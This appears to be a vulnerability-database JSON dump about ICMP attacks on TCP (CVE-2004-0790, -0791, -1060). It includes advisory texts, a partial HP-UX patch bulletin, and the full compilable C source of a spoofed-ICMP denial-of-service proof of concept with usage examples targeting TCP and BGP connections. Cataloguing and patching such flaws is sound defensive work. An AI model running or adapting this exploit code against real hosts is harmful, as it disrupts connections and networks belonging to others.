"CVE-2004-0790", "CVE-2004-1060"], "modified": "2005-04-12T00:00:00", "id": 
"EXPLOITPACK:F18E26220A1C51AD7CB98D811BBAA0E4", "href": "", "sourceData": "source: https://www.securityfocus.com/bid/13124/info\n \nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\n \nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\n \nReportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\n \nThe following individual attacks are reported:\n \n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\n \nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\n \n- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\n \nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\n \n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. 
The Mitre ID CAN-2004-1060 is assigned to this issue.\n \nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\n \n**Update: Microsoft platforms are also reported prone to these issues.\n \nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25389.tar.gz", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:35", "description": "\nMultiple OS (Win32AixCisco) - Crafted ICMP Messages Denial of Service (MS05-019)", "edition": 2, "cvss3": {}, "published": "2005-04-20T00:00:00", "title": "Multiple OS (Win32AixCisco) - Crafted ICMP Messages Denial of Service (MS05-019)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790", "CVE-2004-1060"], "modified": "2005-04-20T00:00:00", "id": "EXPLOITPACK:CA67AC8E4BC50B223150F812C934C82E", "href": "", "sourceData": "/* HOD-icmp-attacks-poc.c: 2005-04-15: PUBLIC v.0.2\n*\n* Copyright (c) 2004-2005 houseofdabus.\n*\n* (MS05-019) (CISCO:20050412)\n* ICMP attacks against TCP (Proof-of-Concept)\n*\n*\n*\n* .::[ houseofdabus ]::.\n*\n*\n*\n* [ for more details:\n* [ http://www.livejournal.com/users/houseofdabus\n* ---------------------------------------------------------------------\n* Systems Affected:\n* - Cisco Content Services Switch 11000 Series (WebNS)\n* - Cisco Global Site Selector (GSS) 4480 1.x\n* - Cisco IOS 10.x\n* - Cisco IOS 11.x\n* - Cisco IOS 12.x\n* - Cisco 
IOS R11.x\n* - Cisco IOS R12.x\n* - Cisco IOS XR (CRS-1) 3.x\n* - Cisco ONS 15000 Series\n* - Cisco PIX 6.x\n* - Cisco SAN-OS 1.x (MDS 9000 Switches)\n* - AIX 5.x\n* - Windows Server 2003\n* - Windows XP SP2\n* - Windows XP SP1\n* - Windows 2000 SP4\n* - Windows 2000 SP3\n* ...\n*\n* ---------------------------------------------------------------------\n* Description:\n* A denial of service vulnerability exists that could allow an\n* attacker to send a specially crafted Internet Control Message\n* Protocol (ICMP) message to an affected system. An attacker who\n* successfully exploited this vulnerability could cause the affected\n* system to reset existing TCP connections, reduce the throughput\n* in existing TCP connections, or consume large amounts of CPU and\n* memory resources.\n* (CAN-2004-0790, CAN-2004-0791, CAN-2004-1060)\n*\n* ---------------------------------------------------------------------\n* Solution:\n* http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx\n* http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml\n*\n* Other References:\n* http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html\n* http://www.kb.cert.org/vuls/id/222750\n*\n* ---------------------------------------------------------------------\n* Tested on:\n* - Windows Server 2003\n* - Windows XP SP1\n* - Windows 2000 SP4\n* - Cisco IOS 11.x\n*\n* ---------------------------------------------------------------------\n* Compile:\n*\n* Win32/VC++ : cl -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\n* Win32/cygwin: gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\n* Linux : gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\n*\n* ---------------------------------------------------------------------\n* Examples:\n*\n* client <---> router <---> router <---> server\n*\n* CLIENT <---> SERVER\n*\n* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:1\n* (abort the connection)\n*\n* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:2\n* (slow down 
the transmission rate for traffic)\n*\n*\n* ROUTER1 <---> ROUTER2\n*\n* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:179 -a:1\n* (DoS Cisco BGP Connections)\n*\n* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:80 -a:2\n* (slow down the transmission rate for traffic)\n*\n* ---------------------------------------------------------------------\n*\n* This is provided as proof-of-concept code only for educational\n* purposes and testing by authorized individuals with permission\n* to do so.\n*\n*/\n\n/* #define _WIN32 */\n\n#ifdef _WIN32\n#pragma comment(lib,\"ws2_32\")\n#pragma pack(1)\n#define WIN32_LEAN_AND_MEAN\n#include <winsock2.h>\n/* IP_HDRINCL */\n#include <ws2tcpip.h>\n\n#else\n#include <sys/types.h>\n#include <netinet/in.h>\n#include <sys/socket.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <arpa/inet.h>\n#include <netdb.h>\n#include <sys/timeb.h>\n#endif\n\n#include <string.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <ctype.h> /* tolower() */\n\n#define MAX_PACKET 4096\n\n#define DEFAULT_PORT 80\n#define DEFAULT_IP \"192.168.0.1\"\n#define DEFAULT_COUNT 1\n\n/* Define the IP header */\ntypedef struct ip_hdr {\n unsigned char ip_verlen; /* IP version & length */\n unsigned char ip_tos; /* IP type of service */\n unsigned short ip_totallength; /* Total length */\n unsigned short ip_id; /* Unique identifier */\n unsigned short ip_offset; /* Fragment offset field */\n unsigned char ip_ttl; /* Time to live */\n unsigned char ip_protocol; /* Protocol */\n unsigned short ip_checksum; /* IP checksum */\n unsigned int ip_srcaddr; /* Source address */\n unsigned int ip_destaddr; /* Destination address */\n} IP_HDR, *PIP_HDR;\n\n/* Define the ICMP header */\n/* Destination Unreachable Message */\ntypedef struct icmp_hdr {\n unsigned char type; /* Type */\n unsigned char code; /* Code */\n unsigned short checksum; /* Checksum */\n unsigned int unused; /* Unused (next-hop MTU in the low 16 bits for type 3/code 4); must stay 32-bit, so not unsigned long on LP64 */\n} ICMP_HDR, *PICMP_HDR;\n\n/* 64 bits of Original Data Datagram (TCP header) */\nchar msg[] =\n\"\\x00\\x50\" /* Source port 
*/\n\"\\x00\\x50\" /* Destination port */\n\"\\x23\\x48\\x4f\\x44\"; /* '#HOD': the 4 bytes that land in the quoted TCP sequence number */\n\n/* globals */\nunsigned long dwToIP, /* IP to send to */\n dwFromIP; /* IP to send from (spoof) */\nunsigned short iToPort, /* Port to send to */\n iFromPort; /* Port to send from (spoof) */\nunsigned long dwCount; /* Number of times to send */\nunsigned long Attack;\n\nvoid\nusage(char *progname) {\n printf(\"Usage:\\n\\n\");\n printf(\"%s <-fi:SRC-IP> <-ti:VICTIM-IP> <-fp:SRC-PORT> [-tp:int] [-a:int] [-n:int]\\n\\n\", progname);\n printf(\" -fi:IP From (sender) IP address\\n\");\n printf(\" -ti:IP To (target) IP address\\n\");\n printf(\" -fp:int Target open TCP port number\\n\");\n printf(\" (for example - 21, 25, 80)\\n\");\n printf(\" -tp:int Initial value for bruteforce (sender) TCP port number\\n\");\n printf(\" (default: 0 = range of ports 0-65535)\\n\");\n printf(\" -n:int Number of packets\\n\\n\");\n printf(\" -a:int ICMP attacks:\\n\");\n printf(\" 1 - Blind connection-reset attack\\n\");\n printf(\" (ICMP protocol unreachable)\\n\");\n printf(\" 2 - Path MTU discovery attack\\n\");\n printf(\" (slow down the transmission rate)\\n\");\n printf(\" 3 - ICMP Source Quench attack\\n\");\n exit(1);\n}\n\nvoid\nValidateArgs(int argc, char **argv)\n{\n int i;\n\n iToPort = 0;\n iFromPort = DEFAULT_PORT;\n dwToIP = inet_addr(DEFAULT_IP);\n dwFromIP = inet_addr(DEFAULT_IP);\n dwCount = DEFAULT_COUNT;\n Attack = 1;\n\n for (i = 1; i < argc; i++) {\n if ((argv[i][0] == '-') || (argv[i][0] == '/')) {\n switch (tolower(argv[i][1])) {\n case 'f':\n switch (tolower(argv[i][2])) {\n case 'p':\n if (strlen(argv[i]) > 4)\n iFromPort = atoi(&argv[i][4]);\n break;\n case 'i':\n if (strlen(argv[i]) > 4)\n dwFromIP = inet_addr(&argv[i][4]);\n break;\n default:\n usage(argv[0]);\n break;\n }\n break;\n case 't':\n switch (tolower(argv[i][2])) {\n case 'p':\n if (strlen(argv[i]) > 4)\n iToPort = atoi(&argv[i][4]);\n break;\n case 'i':\n if (strlen(argv[i]) > 4)\n dwToIP = inet_addr(&argv[i][4]);\n break;\n 
default:\n usage(argv[0]);\n break;\n }\n break;\n case 'n':\n if (strlen(argv[i]) > 3)\n dwCount = atol(&argv[i][3]);\n break;\n case 'a':\n if (strlen(argv[i]) > 3)\n Attack = atol(&argv[i][3]);\n if ((Attack > 3) || (Attack < 1))\n usage(argv[0]);\n break;\n default:\n usage(argv[0]);\n break;\n }\n }\n }\n return;\n}\n\n/* This function calculates the 16-bit one's complement sum */\n/* for the supplied buffer */\nunsigned short\nchecksum(unsigned short *buffer, int size)\n{\n unsigned long cksum = 0;\n\n while (size > 1) {\n cksum += *buffer++;\n size -= sizeof(unsigned short);\n }\n if (size) {\n cksum += *(unsigned char *)buffer;\n }\n cksum = (cksum >> 16) + (cksum & 0xffff);\n cksum += (cksum >>16);\n\n return (unsigned short)(~cksum);\n}\n\nint\nmain(int argc, char **argv)\n{\n\n#ifdef _WIN32\n WSADATA wsd;\n#endif\n int s;\n#ifdef _WIN32\n BOOL bOpt;\n#else\n int bOpt;\n#endif\n struct sockaddr_in remote;\n IP_HDR ipHdr,\n ipHdrInc;\n ICMP_HDR icmpHdr;\n int ret;\n unsigned long i, p;\n unsigned short iTotalSize,\n iIPVersion,\n iIPSize,\n p2,\n cksum = 0;\n char buf[MAX_PACKET],\n *ptr = NULL;\n#ifdef _WIN32\n IN_ADDR addr;\n#else\n struct sockaddr_in addr;\n#endif\n\n printf(\"\\n (MS05-019) (CISCO:20050412)\\n\");\n printf(\" ICMP attacks against TCP (Proof-of-Concept)\\n\\n\");\n printf(\" Copyright (c) 2004-2005 .: houseofdabus :.\\n\\n\\n\");\n\n if (argc < 3) usage(argv[0]);\n\n /* Parse command line arguments and print them out */\n ValidateArgs(argc, argv);\n#ifdef _WIN32\n addr.S_un.S_addr = dwFromIP;\n printf(\"[*] From IP: <%s>, port: %d\\n\", inet_ntoa(addr), iFromPort);\n addr.S_un.S_addr = dwToIP;\n printf(\"[*] To IP: <%s>, port: %d\\n\", inet_ntoa(addr), iToPort);\n printf(\"[*] Count: %d\\n\", dwCount);\n#else\n addr.sin_addr.s_addr = dwFromIP;\n printf(\"[*] From IP: <%s>, port: %d\\n\", inet_ntoa(addr.sin_addr), iFromPort);\n addr.sin_addr.s_addr = dwToIP;\n printf(\"[*] To IP: <%s>, port: %d\\n\", inet_ntoa(addr.sin_addr), iToPort);\n 
printf(\"[*] Count: %lu\\n\", dwCount);\n#endif\n\n#ifdef _WIN32\n if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {\n printf(\"[-] WSAStartup() failed: %d\\n\", GetLastError());\n return -1;\n }\n#endif\n /* Creating a raw socket */\n s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);\n#ifdef _WIN32\n if (s == INVALID_SOCKET) {\n#else\n if (s < 0) {\n#endif\n printf(\"[-] socket() failed\\n\");\n return -1;\n }\n\n /* Enable the IP header include option */\n#ifdef _WIN32\n bOpt = TRUE;\n#else\n bOpt = 1;\n#endif\n ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));\n#ifdef _WIN32\n if (ret == SOCKET_ERROR) {\n printf(\"[-] setsockopt(IP_HDRINCL) failed: %d\\n\", WSAGetLastError());\n return -1;\n }\n#else\n if (ret < 0) {\n printf(\"[-] setsockopt(IP_HDRINCL) failed\\n\");\n return -1;\n }\n#endif\n\n /* Initialize the IP header */\n iTotalSize = sizeof(ipHdr) + sizeof(icmpHdr) + sizeof(msg)-1 + sizeof(ipHdrInc);\n\n iIPVersion = 4;\n iIPSize = sizeof(ipHdr) / 4; /* IHL counts 32-bit words; sizeof(unsigned long) is 8 on LP64, so do not divide by it */\n\n ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;\n ipHdr.ip_tos = 0; /* IP type of service */\n /* Total packet len */\n ipHdr.ip_totallength = htons(iTotalSize);\n ipHdr.ip_id = htons(42451); /* Unique identifier */\n ipHdr.ip_offset = 0; /* Fragment offset field */\n ipHdr.ip_ttl = 255; /* Time to live */\n ipHdr.ip_protocol = 0x1; /* Protocol(ICMP) */\n ipHdr.ip_checksum = 0; /* IP checksum */\n ipHdr.ip_srcaddr = dwFromIP; /* Source address */\n ipHdr.ip_destaddr = dwToIP; /* Destination address */\n\n ipHdrInc.ip_verlen = (iIPVersion << 4) | iIPSize;\n ipHdrInc.ip_tos = 0; /* IP type of service */\n /* Total packet len */\n ipHdrInc.ip_totallength = htons(sizeof(ipHdrInc)+20);\n ipHdrInc.ip_id = htons(25068); /* Unique identifier */\n\n ipHdrInc.ip_offset = 0; /* Fragment offset field */\n ipHdrInc.ip_ttl = 255; /* Time to live */\n ipHdrInc.ip_protocol = 0x6; /* Protocol(TCP) */\n ipHdrInc.ip_checksum = 0; /* IP checksum */\n ipHdrInc.ip_srcaddr = dwToIP; /* Source address */\n ipHdrInc.ip_destaddr = dwFromIP;/* Destination address */\n\n /* Initialize the ICMP 
header */\n icmpHdr.checksum = 0;\n if (Attack == 1) {\n icmpHdr.type = 3; /* Destination Unreachable Message */\n icmpHdr.code = 2; /* protocol unreachable */\n icmpHdr.unused = 0;\n } else if (Attack == 2) {\n icmpHdr.type = 3; /* Destination Unreachable Message */\n icmpHdr.code = 4; /* fragmentation needed and DF set */\n icmpHdr.unused = 0x44000000; /* next-hop MTU - 68 */\n } else {\n icmpHdr.type = 4; /* Source Quench Message */\n icmpHdr.code = 0;\n icmpHdr.unused = 0;\n }\n\n memset(buf, 0, MAX_PACKET);\n ptr = buf;\n\n memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr);\n memcpy(ptr, &icmpHdr, sizeof(icmpHdr)); ptr += sizeof(icmpHdr);\n memcpy(ptr, &ipHdrInc, sizeof(ipHdrInc)); ptr += sizeof(ipHdrInc);\n memcpy(ptr, msg, sizeof(msg)-1);\n iFromPort = htons(iFromPort);\n memcpy(ptr, &iFromPort, 2);\n\n remote.sin_family = AF_INET;\n remote.sin_port = htons(iToPort);\n remote.sin_addr.s_addr = dwToIP;\n\n cksum = checksum((unsigned short *)&ipHdrInc, 20);\n memcpy(buf+20+sizeof(icmpHdr)+10, &cksum, 2);\n\n cksum = checksum((unsigned short *)&ipHdr, 20);\n memcpy(buf+10, &cksum, 2);\n\n for (p = iToPort; p <= 65535; p++) {\n p2 = htons((short)p);\n memcpy((char *)(ptr+2), &p2, 2);\n buf[22] = 0;\n buf[23] = 0;\n cksum = checksum((unsigned short *)(buf+20), sizeof(icmpHdr)+28);\n memcpy(buf+20+2, &cksum, 2);\n\n for (i = 0; i < dwCount; i++) {\n#ifdef _WIN32\n ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote,\n sizeof(remote));\n#else\n ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote,\n sizeof(remote));\n#endif\n#ifdef _WIN32\n if (ret == SOCKET_ERROR) {\n#else\n if (ret < 0) {\n#endif\n printf(\"[-] sendto() failed\\n\");\n break;\n }\n }\n }\n\n#ifdef _WIN32\n closesocket(s);\n WSACleanup();\n#endif\n\n return 0;\n}\n\n// milw0rm.com [2005-04-20]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:35", "description": "\nMultiple Vendor ICMP Implementation - Spoofed Source Quench 
Packet Denial of Service", "edition": 2, "cvss3": {}, "published": "2005-04-12T00:00:00", "title": "Multiple Vendor ICMP Implementation - Spoofed Source Quench Packet Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790", "CVE-2004-1060"], "modified": "2005-04-12T00:00:00", "id": "EXPLOITPACK:71B747534955EA3973CCD9599C63F9C6", "href": "", "sourceData": "source: https://www.securityfocus.com/bid/13124/info\n\nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\n\nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\n\nReportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\n\nThe following individual attacks are reported:\n\n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\n\nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\n\n- An ICMP Source Quench attack. 
This attack takes advantage of the specification that a host must react to received ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\n\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\n\n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.\n\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\n\n**Update: Microsoft platforms are also reported prone to these issues. \n\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25387.tar.gz", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:35", "description": "\nMultiple Vendor ICMP Implementation - Malformed Path MTU Denial of Service", "edition": 2, "cvss3": {}, "published": "2005-04-12T00:00:00", "title": "Multiple Vendor ICMP Implementation - Malformed Path MTU Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790", "CVE-2004-1060"], "modified": "2005-04-12T00:00:00", "id": "EXPLOITPACK:E702ACBD662B14AAF4EE4BDC14AB8BA9", "href": "", 
"sourceData": "source: https://www.securityfocus.com/bid/13124/info\n \nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\n \nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\n \nReportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\n \nThe following individual attacks are reported:\n \n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\n \nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\n \n- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\n \nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\n \n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.\n \nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\n \n**Update: Microsoft platforms are also reported prone to these issues. 
\n\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25388.tar.gz", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:14", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c00576017\r\nVersion: 8\r\n\r\nHPSBUX01164 SSRT4884 HP-UX TCP/IP Remote Denial of Service (DoS)\r\n\r\nNOTICE: The information in this Security Bulletin should be acted\r\nupon as soon as possible.\r\n\r\nRelease Date: 2005-05-25\r\nLast Updated: 2005-12-06\r\n\r\nPotential Security Impact: Remote Denial of Service (DoS)\r\n\r\nSource: Hewlett-Packard Company,\r\n HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\n\r\nA potential security vulnerability has been identified with HP-UX\r\nrunning TCP/IP. This vulnerability could be remotely exploited by\r\nan unauthorized user to cause a Denial of Service(DoS).\r\n\r\nReferences: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791,\r\n CAN-2004-1060\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP-UX B.11.00, B.11.04, B.11.11, B.11.22, B.11.23 running TCP/IP.\r\nHP-UX B.11.11 and B.11.23 running TOUR (Transport Optional Upgrade\r\nRelease).\r\n\r\nBACKGROUND\r\n\r\nAs reported in NISCC VU#532967:\r\nhttp://www.uniras.gov.uk/niscc/docs/al-20050412-00308.html?lang=en\r\nICMP messages may be used to attack TCP/IP connections.\r\n\r\nThere are three issues reported in NISCC VU#532967:\r\n\r\nCVE number: CAN-2004-0790\r\nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0790\r\n\r\nCVE number: CAN-2004-0791\r\nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0791\r\n\r\nCVE number: CAN-2004-1060\r\nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1060\r\n\r\n\r\nAFFECTED VERSIONS\r\n\r\nHP-UX B.11.00\r\n=============\r\nNetworking.NET2-KRN\r\naction: install PHNE_33395, optionally set 
ip_pmtu_strategy=0\r\n\r\nHP-UX B.11.04\r\n=============\r\nNetworking.NET2-KRN\r\naction: install PHNE_33427, optionally set ip_pmtu_strategy=0\r\n\r\nHP-UX B.11.11\r\n=============\r\nNetworking.NET2-KRN\r\naction: install PHNE_33159, optionally set ip_pmtu_strategy=0\r\n\r\nHP-UX B.11.22\r\n=============\r\nNetworking.NET2-KRN\r\naction: install binary files, optionally set ip_pmtu_strategy=0\r\n\r\nHP-UX B.11.23\r\n=============\r\nNetworking.NET2-KRN\r\naction: install PHNE_32606, optionally set ip_pmtu_strategy=0\r\n\r\nHP-UX B.11.11\r\nHP-UX B.11.23\r\n=============\r\nTOUR_PRODUCT.T-NET2-KRN\r\n ->action: install revision A.03.00, optionally set\r\n ip_pmtu_strategy=0\r\n\r\nEND AFFECTED VERSIONS\r\nRESOLUTION\r\n\r\nHP has made the following patches, updates, and binary\r\nfiles available to resolve the issue.\r\n\r\nPatches are available for the core network product from\r\nhttp://itrc.hp.com :\r\n\r\nB.11.00 PHNE_33395 or subsequent\r\n\r\nB.11.04 PHNE_33427 or subsequent\r\n\r\nB.11.11 PHNE_33159 or subsequent\r\n\r\nB.11.23 PHNE_32606 or subsequent\r\n\r\n\r\n ->TOUR revision 3.0 is available from:\r\n ->http://www.hp.com/go/softwaredepot\r\n\r\n ->Binary files are available for B.11.22. Please write to\r\n ->security-alert@hp.com for more information.\r\n\r\nOptionally set ip_pmtu_strategy=0 to work around CAN-2004-1060.\r\nHowever, this may not be necessary:\r\n\r\nAlthough changes in the binary files and patches for CAN-2004-0790\r\nand CAN-2004-0791 do not prevent the exploit of CAN-2004-1060,\r\nthey do make it less likely to succeed. The sequence number check\r\nsuggested in section 5.1 of 'ICMP attacks against TCP' has been\r\nimplemented. 
The Internet Draft of 'ICMP attacks against TCP' can\r\nbe found here:\r\nhttp://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html\r\nCustomers should consider whether this check reduces the risk of\r\nthe exploit to the point that setting ip_pmtu_strategy=0 is not\r\nrequired.\r\n\r\nNote: ip_pmtu_strategy=0 sets the PMTU to 576 bytes and clears the\r\n"Don't Fragment" bit. This disables PMTU discovery. For IPv4 the\r\nNext-Hop MTU may be as low as 68 bytes. Therefore setting\r\nip_pmtu_strategy=0 may cause performance to decrease.\r\n\r\nTo set ip_pmtu_strategy=0:\r\n\r\nEdit /etc/rc.config.d/nddconf to add the following:\r\n\r\nTRANSPORT_NAME[n]=ip\r\nNDD_NAME[n]=ip_pmtu_strategy\r\nNDD_VALUE[n]=0\r\n\r\nwhere 'n' is the next available index value as described in the\r\nnddconf comments.\r\n\r\nThis value will take effect when the system is rebooted.\r\nUntil the system can be rebooted use the following command to read\r\nthe /etc/rc.config.d/nddconf file and set the tunable parameters:\r\n/usr/bin/ndd -c\r\n\r\nThe ip_pmtu_strategy parameter can be displayed by the following\r\ncommand:\r\n/usr/bin/ndd -get /dev/ip ip_pmtu_strategy\r\n\r\nNote: Since open connections will remain potentially vulnerable\r\nuntil they are closed and certain internal data structures are\r\nreleased it is recommended that the system be rebooted.\r\n\r\nNote: There is a defect that will cause "ndd -c" to fail if there\r\nare more than 10 directives in /etc/rc.config.d/nddconf. That\r\ndefect is fixed in the following patches:\r\n\r\nB.11.11 PHNE_25644 or subsequent\r\n\r\nB.11.04 PHNE_26076 or subsequent\r\n\r\nB.11.00 PHNE_26125 or subsequent\r\n\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\nOptionally set ip_pmtu_strategy=0\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Security Patch Check: Security Patch Check revision B.02.00\r\nanalyzes all HP-issued Security Bulletins to provide a subset of\r\nrecommended actions that potentially affect a specific HP-UX\r\nsystem. 
For more information:\r\nhttp://software.hp.com/portal/swdepot/displayProductInfo.do?\r\nproductNumber=B6834AA\r\n\r\nUPDATE HISTORY\r\nInitial release: 25 May 2005\r\nUpdate 1: 1 June 2005 Binary files for B.11.00 and B.11.22 are\r\n available.\r\nUpdate 2: 19 June 2005 Added TOUR information.\r\nUpdate 3: 27 June 2005 PHNE_33159 is available for B.11.11.\r\nUpdate 4: 10 July 2005 PHNE_32606 is available for B.11.23.\r\nUpdate 5: 24 July 2005 PHNE_33395 is available for B.11.00.\r\nUpdate 6: 15 August 2005 PHNE_33427 is available for B.11.04.\r\n\r\n\r\nSupport: For further information, contact normal HP Services\r\nsupport channel.\r\n\r\nReport: To report a potential security vulnerability with any HP\r\nsupported product, send Email to: security-alert@hp.com. It is\r\nstrongly recommended that security related information being\r\ncommunicated to HP be encrypted using PGP, especially exploit\r\ninformation. To get the security-alert PGP key, please send an\r\ne-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\n\r\nSubscribe: To initiate a subscription to receive future HP\r\nSecurity Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&\r\nlangcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\n\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n - check ALL categories for which alerts are required and\r\n continue.\r\nUnder Step2: your ITRC operating systems\r\n - verify your operating system selections are checked and\r\n save.\r\n\r\nTo update an existing subscription:\r\nhttp://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page:\r\n Subscriber's choice for Business: sign-in.\r\nOn the web page:\r\n Subscriber's Choice: your profile summary\r\n - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins 
